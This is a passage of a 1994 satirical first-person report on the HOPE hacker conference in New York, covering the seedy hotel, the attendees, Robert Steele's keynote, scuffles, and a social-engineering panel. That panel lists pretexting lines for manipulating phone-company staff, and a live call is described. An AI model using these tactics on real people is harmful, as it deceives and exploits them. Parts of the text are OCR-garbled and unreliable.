tion of his successfully publishing 2600 - The Hackers Quarterly 
for ten years without getting jailed, shot or worse. For as 
Congressman Ed Markey said to Eric/Emmanuel in a Congressional 
hearing last year, and I paraphrase, 2600 is no more than a 
handbook for hacking (comparable obviously to a terrorist hand\037 
book for blowing up the World Trade Center) for which Eric/Emman\037 
uel should be properly vilified, countenanced and then drawn and 
quartered on Letterman’s Stupid Pet Tricks. 


Ed and Eric/Emmanuel obviously have little room for negotiation 
and I frankly enjoyed watching their Congressional movie where 
communication was at a virtual standstill: and neither side 
understood the viewpoints or positions of the other. 


But Ed is from Baaahhhsten, and Eric/Emmanuel is from New York, 
and HOPE will take place in the Hotel Filthadelphia, straight 
across the street from Pennsylvania Station in beautiful downtown 
fast-food-before-they-mug-you 34th street, right around the 
corner from clean-the-streets-its-Thanksgiving Herald Square. 
Geography notwithstanding, HOPE promised to be a more’ iconoclas\037 
tic gathering than that of DefCon II. 


First off, to set the record straight, I am a New Yorker. No 
matter that I escaped in 1981 for the sunny beaches of California 
for 7 years, and then moved to the Great State of the Legally 
Stupid for four more (Tennessee); no matter that I now live on 
the Gulf Coast of Florida where the water temperature never dips 
below a chilly 98 degrees; I am and always will be a New Yorker. 


It took me the better part of a decade of living away from New 
York to come to that undeniable and inescapable conclusion: Once 
a New Yorker, always a New Yorker. Not that that makes my wife 
any the happier. 


"You are so rude. You love to argue. Confrontation is your 
middle name." Yeah, so what’s your point? 


You see, for a true New Yorker these aren’t insults to be re- 
regurgitated at the mental moron who attempts to combat us in a 
battle of wits yet enters the ring unarmed; these are mer tru\037 
isms as seen by someone who views the world in black and white, 
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Case in point. 


I used to commute into Manhattan from th Westchester County 
suburb of Ossining where I lived 47 feet from the walls of Sing 
Sing prison (no shit!). Overlooking the wid xpans of the 
Hudson River from my aerie several hundred feet above, the only 
disquieting aspect of that location were the enormously deafening 
thunderclaps which resounded a hundred and one times between th 
cliffs on either side of the river. Then there was the occasion\037 
al escapee-alarm from the prison. 


So, it was my daily New York regimen to take the 8:15 into the 
city. If the train’s on time I’1l get to work by nine 


Grand Central Station - the grand old landmark thankfully saved 
by the late Jackie O. - is the nexus for a few hundred million 
commuters who congregate in New York Shitty for no other reason 
that to collect a paycheck to afford blood pressure medicin 


You have to understand that New York is different. Imagine, 
picture in your mind: nothing is so endearing as to watch thou\037 
sands of briefcase carrying suits scrambling like ants in a Gary 
Larson cartoon for the nearest taxi, all the while greeting their 
neighbors with the prototypical New York G’day! 


With both fists high in the air, middle fingers locked into erect 
prominence, a cacophonous chorus of "Good Fucking Morning" 
brightens the day of a true New Yorker. His bloodshot eyes 
instantly clear, the blood pressure sinks by 50% and already the 
first conflict of the day has been waged and won. 


Welcome to the Big Apple, and remember never, ver, to say, "Have 
a Nice Day." Oh, no. Never. 


So HOPE was bound to be radically different from Vegas’s DefCon 
II, if only for the setting. But, I expected hard core. The 
European contingent will be there, as will Israel and South 
America and even the Far East. All told, I am told, 1000 or more 
are expected. And again, as at DefCon II, I am to speak, but 
Eric/Emmanuel never told me about what, when, or any of the other 
niceties that go along with this thing we call a schedule. 


kK kK kK kK OK 


God, I hate rushing. 


Leaving Vienna at 3:15 for a 4PM Amtrak "put your life in their 
hands" three hour trip to New York is not for the faint of heart. 
My rented Hyundai four cylinder limousine wound up like a sewing 
machine to 9,600 RPM and hydroplaned the bone dry route 66 into 
the pot holed, traffic hell of Friday afternoon Washington, DC. 
Twelve minutes to spare. 


I made the 23 mile trip is something less than three minutes and 
bounded into the Budget rental return, decelerated to impulse 
power and let my brick and lead filled suitcase drop to the 
pavement with a dent and a thud. "Send me the bill," I hollered 
at the attendant. Never mind that Budget doesn’t offer express 
service like real car rental companies. "Just send me the bill!" 
and I was off. 


Eight minute to spare. Schlepp, schlepp. Heavy, heavy. 


Holy shit! Look at the line for tickets and I had reservations. 


"Ts this the line for the four o’clock to New York?" Pant, 
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breathless. 
"Yeah." She never looked up. 


"Will they hold the train?" 


"No." A resoundingly rude no at that. Panic gene takes over. 


"What about the self-ticketing computer?" I said pointing at the 
self ticketing computer. 


"Do you have a reservation?" 
"Yup." Maybe there is a God. 
"Won’t help you." 

"What?" 

Nothing. 


"What do you mean won’t help?" 


"Computer’s broken." Criminy! I have 4 minutes and here’s this 
over-paid over-attituded Amtrak employee who thinks she’s the 
echo of Whoopi Goldberg. "The line’s over there." 


Have you ever begged? I mean really begged? Well I have. 


"Are you waiting for the four?" "Can I slip ahead?" "Are you in 
a death defying hurry?" "I’1ll give you a dime for your spot in 
line." "You are so pretty for 76, ma’am. Can I sneak ahead?" 

Tears work. Two excruciating minutes to go. I bounced ahead of 
everyone in a line the length of the Great Wall of China, got my 
tickets and tore ass through Union Station The closing gate 


missed me but caught the suitcase costing me yet more time as I 
attempted to disgorge my now-shattered valise from the fork-lift-— 
like spikes which protect the trains from late-coming commuters. 
The rubber edged doors on the train itself were kinder and gen\037 
tler, but at this point, screw it. It was Evian and Fritos' for 
the next three hours. 


eK OR he 


Promises tend to be lies. The check is in the mail; Dan Quayle 
will learn to spell; I won’t raise taxes. I wonder about HOPE. 


"It’s going to be Bust Central," said one prominent hacker who 
threatened me with electronic assassination if I used his name. 


"Emmanuel will kill me." Apparently the authorities-—who-b ar 
going to be there in force. "They want to see if Corrupt or any 

of the MoD crew stay after dark, then Zap! Back to jail. (gig\037 
gle, giggle.) I want to see that." 


Will Mitnick show up? I’d like to talk to that boy. A thousand 
hackers in one place and Eric/Emmanuel egging on the Feds to do 
something stupid. Agent Steal will be there, or registered at 
least, and half of the folks I know going are using aliases. 


"I'd like a room please." 
"Yessir. Name?" 
"Monkey Meat." 


"Is that your first or last name?" 
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"First." 

"Last name?" 

"Dilithium Crystal." 

"Could you spell that?" 

Now: I know the Hotel Pennsylvania. It used to be the high 
class Statler Hilton until Mr. Hilton himself decided that the 
place was beyond hope. "Sell it or scuttle it." They sold and 
thus begat the hotel Filthadelphia. I stayed here once in 1989 
and it was a cesspool then. I wondered why the Farsi-fluent 
bellhop wouldn’t tell me how bad the damage was from the fire 
bombed 12th floor. The carpets were the same dingy, once upon a 
time colorful, drab as I remembered. And, I always have a bit of 
trouble with a hotel who puts a security check by the elevator 
bank. Gives you the warm and fuzzies that make you want to come 


back 


Isa 
but t 
and 

euphe 
still 


right away. 


ved $2 because none of the bell hops noticed I needed help, 
hen again, it wouldn’t have mattered for there was no way he 
I and my luggage were going to fit inside of what the hotel 
mistically refers to as a ’room’. Closet would be kind but 


still 
almos 


The 


inaccurate. I think the word, ah, ’$95 a night slum’ might 
be overly generous. Let’s try . . . ah ha! the room that 
t survived the fire bombing. Yeah, that’s the ticket. 


walls were pealing. Long strips of yellowed antique wall\037 


paper 
wards 
the p 
where 
terne 
Hotel 


mbellished the flatness of the walls as they curled to\037 
the floor and windows. The chunks of dried glu decorated 
astel gray with texture and the water stains from I know not 

slithered their way to the soggy carpet in fractal pat\037 
d rivulets. I stood in awe at early funk motif that the 


aru 


Filthadelphia chose in honor of my attendance at HOPE. 


But, 
clean 


In o 
bags 
drenc 


going 


Hilto 
am sa 


no matter how bad my room was, at least it was bachelor 
. (Ask your significant other what that means. . .) 


ne hacker’s room no bigger than mine I counted 13 sleeping 
lying amongst the growing mold at the intersection of the 
hed wallboard and putrefying carpet shreds. (God, I love 
to hacker conferences! It’s not that I like Hyatt’s and 
n’ all that much: I do prefer the smaller facilities, but, I 
d to admit, clean counts at my age.). My nose did not have 


to venture towards the floor to be aware that the Hotel Filtha\037 
delphia was engaging in top secret exobiological government 


iments bent on determining their communicability and infec\037 


xper 
tion 


The 
place 
inner 
al cr 
home) 
bia, 


factor. 


top floor of the Hotel Filthadelphia - the 18th - was the 
for HOPE, except th levator door wouldn’t open. The 
door did, but even with the combined strength of my person\037 
owbar (a New York defensive measure only; I never use it at 
and three roughians with a bad case of Mexican Claustropho\037 
we never got the door open. 


The guard in the lobby was a big help. 


W Try 


Damne 


again." 


d if he didn’t know his elevators and I emerged into the 


pe 


pre-HOPE chaos of preparing for a conference. 


About 


100 hackers lounged around in varying forms of disarray —- 


Hey Rop! 


Rop Gongrijjp editor of the Dutch Hacktic is a both a friend and 


an Oc 


casional source of stimulating argument. Smart as a whip, I 
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don’t always agree with him, though, the above-ground security 
types ought to talk to him for a clear, concise and coherent 
description of the whys and wherefores of hacking. 


Hey Emmanuel! Hey Strat! Hey Garbage Heap! Hey Erikb! Hey to 
lots of folks. Is that you Supernigger? And Julio? I was’ sur\037 
prised. I knew a lot more of these guys that I thought I did. 
Some indicted, some unindicted, some mere sympathizers and other 
techno-freaks who enjoy a weekend with other techno-freaks. 
Security dudes - get hip! Contact your local hacker and make 
friends. You’ll be glad you did. 


>From behind - got me. My adrenaline went into super-saturated 
mode as I was grabbed. I turned and it was .. . Ben. Ben is a 
hugger. "I just wanted to hug you," he said sweetly but without 
the humorous sexually deviant connotation that occurred during 
Novocain’s offer to let Phil Zimmerman sleep with him in Las 
Vegas. 


I smiled a crooked smile. "Yeah, right." Woodstock ’94 was a 
mere 120 miles away . . .maybe there was a psychic connection. 
But Ben was being sincere. He was hugging everyone. Everyone. 
At 17, he really believes that hugging and hacking are next to 
Godliness. Boy does he have surprise coming the first time his 
mortgage is late. Keep hugging while you have the chance, Ben. 


Assorted cases of Zima (the disgusting Polish is-this-really-lim 
flavored beer of choice by those without taste buds) appeared, 
but anyone over the age of 21 drank Bud. What about the 12 year 
olds drinking? And the 18 year olds? And the 16 year olds? 


"Rop, I don’t think you need to give the hotel an excuse to bust 
you guys outta here." Me, fatherly and responsible? Stranger 
things have happened. The beer was gone. I’m not a teetotaler, 
but I didn’t want my weekend going up in flames because of some 
trashed 16 year old puking on an Irani ambassador in the lobby. 
No reason to test fate. 


kK kK kK kK 


Nothing worked, but that’s normal. 


Rop had set up HEU (Hacking at the End of the Universe) in 


Holland last year with a single length of 800m ethernet. (That’s 
meter for the Americans: about 2625 ft.) HOPE, though was dif\037 
ferent. The Hotel Filthadelphia’s switchboard and phone systems 
crashed every half hour or so which doesn’t do a lot for the 


health of 28.8 slip lines. 


The object of the exercise was seemingly simple: plug together 
about 20 terminals into a terminal server connected to Hope.Com 
and let ‘’em go at it. Provide ’net access and, to the lucky 
winner of the crack-the-hopenet server (root) the keys to a 1994 
Corvette! 


You heard it right! For breaking into root of their allegedly 
secur server, the folks at 2600 are giving away keys to a 1994 
Corvette. They don’t know where the car is, just the keys. But 
they will give you the car’s last known location . . . or was it 
$50 in cash? 


Erikb -— Chris Goggans - showed up late Friday night in disguise: 
a baseball cap over his nearly waist length dirty blond hair. 


"He’s here!" one could hear being muttered. "He had the balls to 
show up!" "He’s gonna get his ass kicked to a pulp." "So you 
did come .. .I1 was afraid they’d intimidated you to stay in 


Texas." 
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No way! "Why tell the enemy what your plans are." Even the 50’s- 
something ex-amphetamine-dealer turned reseller of public-records 
Bootleg didn’t know Goggans was going to be there. But the 


multiple fans of Erikb, (a strong resemblance to Cyber Christ if 
he do say so himself) were a-mighty proud to see him. 


This stunning Asian girl with skin too soft to touch (maybe she 
was 14, maybe she was 25) looked at Erikb by the message board. 
"You're," she pointed in disbelief "Erikb?" Chris nods, getting 
arrogantly used to the respectful adulation. Yeah, that’s me, to 
which the lady/girl/woman instantly replied, "You’re such an 
asshole." Smile, wide smile, hug, kiss, big kiss. Erikb revels 
in the attention and hundreds of horny hackers jealously look on. 


Friday night was more of an experience —- a Baba Ram Dass-like Be 
Here Now experienc with mellow being the operative word. The 


hotel had apparently sacrificed 20,000 square feet of its pent\037 


house to hackers, but it was obvious to see they really didn’t 
give a damn if the whole floor got trashed. Ceiling panels 


dripped from their 12 foot lofts making a scorched Shuttle under\037 


belly look pristine. What a cesspool! I swear nothing had been 
done to the decorative environs since the day Kennedy was’ shot. 
But kudos to Emmanuel for finding a centrally located cesspool 
that undoubtedly gave him one hell of a deal. I think it would be 
a big mistake to hold a hacker conference at the Plaza or some 
such snooty overly-self-indulgent denizen of the rich. 


Filth sort of lends credibility to an event that otherwise seeks 
notoriety. 


I didn’t want to take up too much of Emmanuel’s and Rop’s time - 
they were in setup panic - so it was off to the netherworld until 
noon. That’s when a civilized Con begins. 


i, SU Sc SM 


I dared to go outside; it was about 11AM and I was in search of 
the perfect New York breakfast: a greasy spoon that serves coffee 
as tough as tree bark and a catatonia inducing egg and _ bacon 
sandwich. Munch, munch, munch on that coffee. 


I’d forgotten how many beggars hang out on the corner of 33rd and 
7th, all armed with the same words, "how about a handout, Winn?" 
How the hell do they know my name? "Whatever you give will come 
back to you double and triple . . . please man, I gotta eat." It 
is sad, but John Paul Getty I ain’t. 


As I munched on my coffee and sipped my runny egg-sandwich I 
noticed that right in front of the runny-egg-sandwich place sat a 
Ford Econoline van. Nice van. Nice phone company van. What are 


they doing here? Oh, yeah, the hackers need lines and the switch\037 


board is down. Of course, the phone company is here. But, 


what’s that? Hello? A Hacker playing in the phone van? I recog\037 


nize you! You work with Emmanuel. How? He’s robbing it. Not 
robbing, maybe borrowing. 


The ersatz telephone van could have fooled anyone - even me, a 
color blind quasi-techno-weanie to yell "Yo! Ma Bell!" But, upon 
not-too-closer inspection, the TPC (The Phone Company) van was in 
fact a 2600 van - straight from the minds of Emmanuel and 
friends. Impeccable! The telephone bell in a circle logo is, in 
this case, connected via cable to a hacker at a_ keyboard. The 
commercial plates add an additional air of respectability to the 


whole image. It works. 


kK kK kK kK 


Up to HOPE - egg sandwich and all. 
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Th keynot speech was to be provided courtesy of the Man in 
Blue. Scheduled for noon, things were getting off to a late 
start. The media (who were there in droves, eat your heart out 
CSI) converged on the MIB to see who and why someone of his 
stature would (gasp!) appear/speak at a funky-downtown hotel 
filled with the scourges of Cyberspace. I didn’t see if Ben 
hugged the MIB, but I would understand if he didn’t. Few people 
knew him or suspected what size of Jim-Carey-MASK arsenal might 
suddenly appear if a passive hug were accidentally interpreted as 
being too aggressive. The MIB is imposing and Ben too shy. 


The media can ask some dumb questions and write some dumb arti\037 
cles because they spend 12 1/2 minutes trying to understand an 
entire culture. Can’t do that fellows! 


The MIB, though, knows hackers and is learning about them more 
and more; and since he is respectable, the media asks him about 
hackers. What are hackers? Why are YOU here, Mr. MIB? 


"Because they have a lot to offer. They are the future," the Man 
In Blue said over and over. Interview after interview how time 
flies when you’re having fun - and the lights and cameras are 
rolling from NBC and PIX and CNN and assorted other channels and 
magazines. At 12:55 chaos had not settled down to regimented 
disorganization and the MIB was getting antsy. After all, he was 
a military man and 55 minutes off schedule: Egad! Take charge. 


The MIB stood on a chair and hollered to the 700+ hacker phreaks 
in the demonstration ballroom, "Hey! It’s starting. lLet’s go the 
theater and get rocking! Follow me." He leaned over to me: "Do 
you know where the room is?" 


"Sure, follow me." 


"Everyone follow, c’mon," yelled the MIB. "I’m going to get 
started in exactly three minutes," and three minutes he meant. 
Despite the fact that I got lost in a hallway and had hundreds of 
followers following my missteps and the MIB yelling at me _ for 
getting lost in a room with only two doors, we did make the main 
hall, and within 90 seconds he took over the podium and began 
speaking. 


"I bet you’ve always wanted to ask a spy a few questions. Here’s 
your chance. But let me say that the United States intelligence 
community needs help and you guys are part of the solution." The 
MIB was impeccably dressed in his pin stripe with only traces of 

a Hackers 80 T-shirt leaking through his starched white dress 
shirt. The MIB is no less than Robert Steele, ex-CIA type spy, 
senior civilian in Marine Corps Intelligence and now the Presi\037 
dent of Open Source Solutions, Inc. 


He got these guys (and gals) going. Robert doesn’t mince words 
and that’s why as he puts it, he’s "been adopted by the hackers." 
At his OSS conferences he has successfully juxtaposed hackers and 
senior KGB officials who needed full time security during their 
specially arranged 48 hour visa to Washington, DC. He brought 
Emmanuel and Rop and clan to his show and since their agendas 
aren’t all that different, a camaraderie was formed. 


Robert MIB Steele believes that the current intelligence machin\037 
ery is inadequate to meet the challenges of today’s world. Over 
80% of the classified information contained with the Byzantine 
bowels of the government is actually available from open sources. 

We need to realize that the future is more of an open book than 
ever before. 


We classify newspaper articles from Peru in the incredibly naive 
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belief that only Pentagon spooks subscribe. We classify BBC 
video tapes from the UK with the inane belief that no one will 
watch it if it so stamped. We classify $4 Billion National 
Reconnaissance Office satellite generated street maps of Calle, 
Colombia when anyone with an IQ only slightly above a rock can 
get th sam one from the tourist office. And that’s where 
hackers come in. 


"You guys are a national resource. [Too bad everyone’s so scared 
of you." Applause from everywhere. The MIB knows how to massage 
a crowd. Hackers, according to Steele, and to a certain extent I 
agree, ar th truth tellers "in a constellation of complex 
systems run amok and on the verge of catastrophic collapse." 


Hackers are the greatest sources of open source information in 
the world. They have the navigation skills, they have th time, 
and they have the motivation, Robert says. Hackers perus th 
edges of technology and there is little that will stop them in 
their efforts. The intelligence community should take advantage 
of the skills and lessons that the hackers have to teach us, yet 
as we all know, political and social oppositions keep both sides 
(who are really more similar then dissimilar) from talking. 


"Hackers put amirror up to the technical designers who have 


built the networks, and what they see, they don’t like. Hackers 
have shown us all the chinks in the armor of a house without 
doors or windows. The information infrastructure is fragile and 


we had better do something about it now; before it’s too late." 


Beat them at their own game, suggests Steele. Keep the doors of 
Cyberspace open, and sooner or later, the denizens of the black 
holes of information will have to sooner or late realize that the 
cat is out of the bag. 


Steel ducated the Hacker crowd in a way new to them: he treat\037 
ed them with respect, and in turn he opened a channel of dialog 
that few above ground suit-types hav ver nvisioned. Steele 
works at the source. 


HOPE had begun and Robert had set the tone. 


a SO ee SE 


The day was long. Dogged by press, hackers rolled over so the 
reporters could tickle their stomachs on camera. Despite their 
public allegations that the media screws it up and never can get 
the story right, a camera is like a magnet. The New York Times 
printed an article about HOPE so off the wall I wondered if the 
reporter had actually been there. Nonetheless, the crowds fol\037 
lowed th cameras, the cameras followed the crowds, and the 
crowds parted like the Red Sea. But these were mighty colorful 
crowds. 


We all hear of that prototypical image of the acne faced, Jolt- 
drinking, pepperoni downing nerdish teenager who has himself 
locked in the un-air-conditioned attic of his parents’ half 
million dollar house from the time school gets out till the sun 
rises. Wrongo security-breath. Yeah, there’s that component, but 

I was reminded of the ’80’s, the early ’80’s by a large percent\037 
age of the crowd. 


Purple hair was present but scarce, and I swear on a_ stack of 
2600’s that Pat from Saturday Night Live was there putting every\037 


one’s hormonal guess-machines to the test. But what cannot help 
but capture one’s attention is a 40 pin integrated circuit in\037 
serted into the shaved side skull of an otherwis clean-cut 


Mohawk haircut. 
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The story goes that Chip Head went to a doctor and had a pair of 
small incisions placed in his skull which would hold the _ leads 
from the chip. A little dab of glue and in a few days the skin 
would grow back to hold the 40 pins in the natural way; God’s 
way. 


There was a time that I thought ponytails were ‘out’ and passe, 
but I thought wrong. Mine got chopped off in roughly 1976 down 
to shoulder length which remained for another six years, but half 
of the HOPE audience is the reason for wide spread poverty in the 
hair salon industry. 


Nothing wrong with long, styled, inventive, outrageous hair as 
long as it’s clean; and with barely an exception, such was the 
case. In New York it’s not too hard to be perceived as clean, 
especially when you consider the frame of reference. Nothing is 
too weird. 


Th nergy level of HOPE was much higher than the almost lethar\037 
gic (but good!) DefCon II. People move in a great hurry, perhaps 
to convey th sense of importance to others, or just out of 
frenetic hyperactivity. Hackers hunched over their keyboards - 
yet with a sense of urgency and purpose. Quiet yet highly animat\037 
ed conversations in all corners. HOPE staff endlessly pacing 
throughout the event with their walkie-talkies glued to their 
ears. 


Not many suit types. A handful at best, and what about the Feds? 
I was accosted a few times for being a Fed, but word spread: no 
Fed, no bust. Where were the Feds? In the lobby. The typical 
NYPD cop has the distinctive reputation of being overweight 
especially when he wearing two holsters - one for the gun and one 
for the Italian sausage. Perpetually portrayed as donut dunking 
dodo’s, some New York cops’ asses are referred to as the Fourth 
Precinct and a few actually moonlight as sofas. 


So rather than make a stink, (NY cops hate to make a scene) th 
lobby of the Hotel Filthadelphia was home to the Coffee Clutch 
for Cops. About a half dozen of them made their profound 
presence known by merely spending their day consuming mass quan\037 
tities of questionabl ingestibles, but that was infinitely 
preferable to hanging out on the 18th floor. The hackers weren’t 
causing any trouble, the cops knew that, so why push it. Hackers 
don’t fight, they hack. Right? 


After hours of running hours behind schedule, the HOPE conference 
was in first place for disorganized, with DefCon II not far 
behind. Only with 1000 people to keep happy and in the = right 
rooms, chaos reigns sooner. The free Unix sessions and Pager 
session and open microphone bitch session and the unadulterated 
true history of 2600 kept audiences of several hundred hankering 
for more - hour after hour. 


Over by the cellular hacking demonstrations, I ran into a hacker 
I had written about: Julio, from the almost defunct Masters of 
Destruction. Julio had gone state’s evidence and was prepared to 
testify against MoD ring leader Mark Abene (aka Phiber Optik) but 
once Mark pled guilty to enough crimes to satisfy the Feds, Julio 
was off the hook with mere probation. Good guy, sworn off of 
hacking. Cell phones are so much more interesting. 


However, while standing around with Erikb and a gaggle of Cyber 
Christ wanna-bes, Julio and his friend (who was the size of Texas 
on two legs) began a pushing match with Goggans. "You fucking 
narc red-neck son of a bitch." Goggans helped build the case 
against the MoD and didn’t make a lot of friends in the process. 


The shoving and shouldering reminded me of slam dancing from 
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decades past, but these kids are too young to have taken part in 
the social niceties of deranged high speed propulsion and revul\037 


sion on the dance floor. So it was a straight out pushing match, 
which found Erikb doing his bloody best to avoid. Julio and pal 
kept a’coming and Erikb kept avoiding. It took a dozen of us to 


get in the middle and see that Julio was escorted to the eleva\037 
tors. 


Julio said Corrupt, also of the MoD, was coming down to HOPE, 
too. Corrupt has been accused of mugging drug dealers to finance 
his computer escapades, and was busted along with the rest of the 
MoD gang. The implied threat was taken seriously, but, for 
whatever reason, Corrupt never showed. It is said that the 
majority of the hacking community distances itself from him; he’s 
not good for the collective reputation. So much for hacker 
fights. All is calm. 


[The evening sessions continued and continued with estimates of as 
late as 4AM being bandied about. Somewhere around 1:00AM I= ran 
into Bootleg in the downstairs bar. Where was everybody? Not 
upstairs. Not in the bar. I saw a Garbage Heap in the street 
outside (now that’s a double entendre) and then Goggans popped up 
from the door of the Blarney Stone, a syndicated chain of low- 
class Irish bars that serve fabulously thick hot sandwiches. 


"We’re about to get thrown out." 


"From the Blarney Stone? That’s impossible. Drunks call the 
phone booths home!" 


Fifty or so hacker/phreaks had migrated to the least likely, most 
anachronistic location one could imagine. A handful of drunken 
sots leaning over their beers on a stain encrusted wooden breed\037 
ing ground for salmonella. A men’s room that hasn’t seen the 
fuzzy end of a brush for the best part of a century made Turkish 
toilets appear refreshingly clean. And they serve food here. 


I didn’t look like a hacker so I asked the bartender, "Big crowd, 
eh?" 


The barrel chested beer bellied barman nonchalantly replied, 
"nah. Pretty usual." He cleaned a glass so thoroughly the water 
marks stood out plainly. 


"Really? This much action on a Saturday night on a dark side 
street so questionably safe that Manhattan’s Mugger Society posts 
warnings?" 

W Yup a W 

"So," I continued. "These hackers come here a lot?" 


"Sure do," he said emphatically. 


"Wow. I didn’t know that. So this is sort of a hacker bar, you 
might say?" 


"7 


Exactly. Every Saturday night they come in and raise a little 
hell." 


With a straight face I somehow managed to thank the confused 
barman for his help and for the next four hours learned that 
socially, hackers of today are no different than many if not most 
of us were in our late teens ad early twenties. We laughed and 
joked and so do they - but there is more computer talk. We 
decried the political status of our day as they do theirs, albeit 
they with less fervor and more resignation. The X-Generation 
factor: most of them give little more than a tiny shit about 
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things they view as being totally outside their control, so why 
bother. Live for today. 


Know they enemy. Robert hung in with me intermingling and argu\037 
ing and debating and learning from them, and they from us. 
Hackers aren’t th nemy their knowledge is - and they are not 
the exclusive holders of that information. Information Warfare 

is about capabilities, and no matter who possesses that capabili\037 
ty, there ought to be a corresponding amount respect. 


Indeed, rather than adversaries, hackers could well become gov\037 
ernment allies and national security assets in an intense inter\037 
national cyber-conflict. In the LoD/MoD War of 1990-91, one 
group of hackers did help authorities. Today many hackers assist 
professional organizations, governments in the US and overseas - 
although very quietly. 'Can’t be seen consorting with the 
enemy.’ Is hacking from an Army or Navy or NATO base illegal? 
Damned if I know, but more than one Cyber Christ-like character 
makes a tidy sum providing hands-on hacking education to the 
brass in Europe. 


Where these guys went after 5AM I don’t know, but I was one of 
the first to be back at the HOPE conference later that day; 12:30 
PM Sunday. 


kK kK kK kK 


The Nazi Hunters were out in force. 


"The Neo-Nazi skinheads are trying to start another Holocaust." A 
piercing, almost annoying voice stabbed right through the crowds. 
"Their racist propaganda advocates killing Jews and blacks. They 
have to be stopped, now." 


Mortechai Levy (I’11 call him Morty) commanded the attention of a 
couple dozen hackers. Morty was a good, emotional, riveting 


shouter. "These cowardly bastards have set up vicious hate call 
lines in over 50 cities. The messages advocate burning syna\037 
gogues, killing minorities and other violence. These phones hav 


to be stopped!" 


Th ver-present leaflet from Morty’s Jewish Defense Organization 
asked for help from the 2600 population. 


"Phone freaks you must use your various assorted bag of 
tricks to shut these lines down. No cowardly sputterings 


about ’free speech’ for these fascist scum." 


The headline invited the hacker/phreak community to: 


"Let’s Shut Down ’Dial-A-Nazi’!!!" 


Morty was looking for political and technical support from a band 
of nowhere men and women who largely don’t know where they’re 
going much less care about an organized political response to 
someone elses cause. He wasn’t making a lot of headway, and he 
must have know that he would walk right into the anarchist’s 
bible: the lst amendment. 


The battle lines had been set. Morty wanted to see the Nazis 
censored and hackers are absolute freedom of speechers by any 
measure. Even Ben sauntering over for a group hug did little to 
defuse the mounting tension. 


I couldn’t help but play mediator. Morty was belligerently loud 
and being deafeningly intrusive which affected the on-going ses\037 
sions. To tone it down some, we nudged Morty and company off to 
the side and occupied a corner of thread bare carpet, leaning 
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against a boorish beige wall that had lost its better epidermis. 


Th heated freedom of speech versus the promotion of racial 
genocide rancor subdued little even though we were all buns’ side 
down. I tried to get a little control of the situation. 


"Morty. Answer me this so we know where you’re coming from. You 
advocate the silencing of the Nazis, right? 


"They’re planning a new race war; they have to be stopped." 


"So you want them silenced. You say their phones’ should be 
stopped and that the hackers should help." 


"Call that number and they’1ll tell you that Jews and blacks 
should be killed and then they..." 


"Morty. OK, you want to censor the Nazis. Yes or No." 
"Yes." 
"OK, I can understand that. The question really is, and I. need 


your help here, what is the line of censorship that you advocate. 
Where is your line of legal versus censored?" 


A few more minutes of political diatribe and then he got to the 
point. "Any group with a history of violence should be censored 
and stopped." A little imagination and suddenly the whole planet 
is silenced. We need a better line, please. "Hate group, Nazis, 
people who advocate genocide . ‘ . they should be 
Silenced... ." 

"So," I analyzed. "You want to establish censorship criteria 
based upon subjective interpretation. Whose interpretation?" 


My approach brought nods of approval. 


One has to admire Morty and his sheer audacity and tenacity and 
how much he strenuously and single-mindedly drives his points 


home. He didn’t have the ideal sympathetic audience, but he 
wouldn’t give an inch. Not an inch. A little self righteousness 
goes a long way; boisterous extremism grows stale. It invites 


punitive retorts and teasing, or in counter-culture jargon, 
"fucking with their heads." 


Morty (perhaps for justifiable reasons) was totally inflexible 
and thus more prone to verbal barbing. "You’re just a Jewish 
racist. Racism in reverse," accused one jocular but definitely 


lower middle class hacker with an accent thicker than all of 
Brooklyn. 


Incoming Scuds! Look out! Morty went nuts and as they say, 
freedom of speech ends when my fists impacts upon your nose. 
Morty came dangerously close to crossing that line. Whoah, 


Morty, whoah. He’s just fucking with your head. The calm-down 
brigade did its level best to keep these two mortals at opposite 
ends of the room. 


"You support that Neo Nazi down there; you’re as bad as_ the 


rest!" Morty said. "See what I have to tolerate. I know him, 
we’ve been keeping track of him and he hangs out with the son of 
the Grand Wizard of Nazi Oz." The paranoid train got on the 
tracks. 


"Do you really know the Big Poo-bah of Hate?" I asked the hacker 
under assault and now under protective custody. 


"Yeah," he said candidly. "He’s some dick head who hates every\037 
one. Real jerk." 
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"So what about you said to Morty over there?" 


"Just fucking with his head. He gets a little extreme." So we 
had in our midst the Al Sharpton of the Jewish faith. Ballsy. 
Since Morty takes Saturday’s off by religious law, he missed th 
press cavalcade, but as a radical New York fixture, the media 
probably didn’t mind too much. 


I was off to sessions, Morty found new audiences as they came off 
the elevators, and the band played on. 


kK kK kK kK 


GJ 


In my humble 40-something opinion, the best session of HOP 
the one on social engineering. 


was 


The panel consisted of only Emmanuel, Supernigger (social engi\037 
neer par excellence) and Cheshire Catalyst. The first bits were 
pretty staid dry conventional conference (ConCon) oriented, but 
nonetheless, not the kind of info that you expect to find William 

H. Murray, Executive Consultant handing out. 


The best social engineers make friends of their victims. Remem\037 
ber: you’re playing a role. Think Remington Steele. 
Schmooze! "Hey, Jack did you get a load of the blond on Stern 


last night?" 


Justifiable anger: "Your department has caused nothing but head\037 
aches. These damn new computers/phones/technology just don’t 
work like the old ones. Now either you help me now or I’m_ going 
all the way to Shellhorn and we’ll what he says about these kinds 

of screwups." A contrite response is the desired effect. 


Butt headed bosses: "Hey, my boss is all over my butt, can you 
help me out?" 


Management hatred: "I’m sitting here at 3PM working while man\037 
agement is on their yachts. Can you tell me... .?" 
Giveaways: "Did you know that so and so is having an affair with 


so and so? It’s true, I swear. By the way, can you tell me how 
Or. cae HE" 


Empathy: "I’m new, haven’t been to the training course and they 
expect me to figure this out all by myself. It’s not fair." 
Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah 


passurt. Cunu help? Ah, tanku." Good for a quick exchange and a 
quick good-bye. Carefully done, people want you off the phone 
quickly. 


Billsf, the almost 40 American phreak who now calls Amsterdam 
home was wiring up Supernigger’s real live demonstration of 
social engineering against Sprint. A dial tone came over th PA 
system followed by the pulses to 411. 


"Directory Assistance," the operator’s male voice was squeezed 
into a mere three kilohertz bandwidth. 


Suddenly, to the immense pleasure of the audience, an ear-split\037 
ting screech a thousand times louder than finger nails on a chalk 
board not only belched across the sound system but caused instant 
bleeding in the ears of the innocent but now deaf operator. 
Billsf sheepishly grinned. "Just trying to wire up a mute 
button." 
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Three hundred people in unison responded: "It doesn’t work." No 
Shits 


While Billsf feverishly worked to regain his reputation, Super\037 
nigger explained what he was going to do. The phone companies 
have a service, ostensibly for internal use, called a C/NA. Sort 

of a reverse directory when you have the number but want to know 
who the number belongs to and from whence it comes. You can 
understand that this is not the sort of feature that the phone 
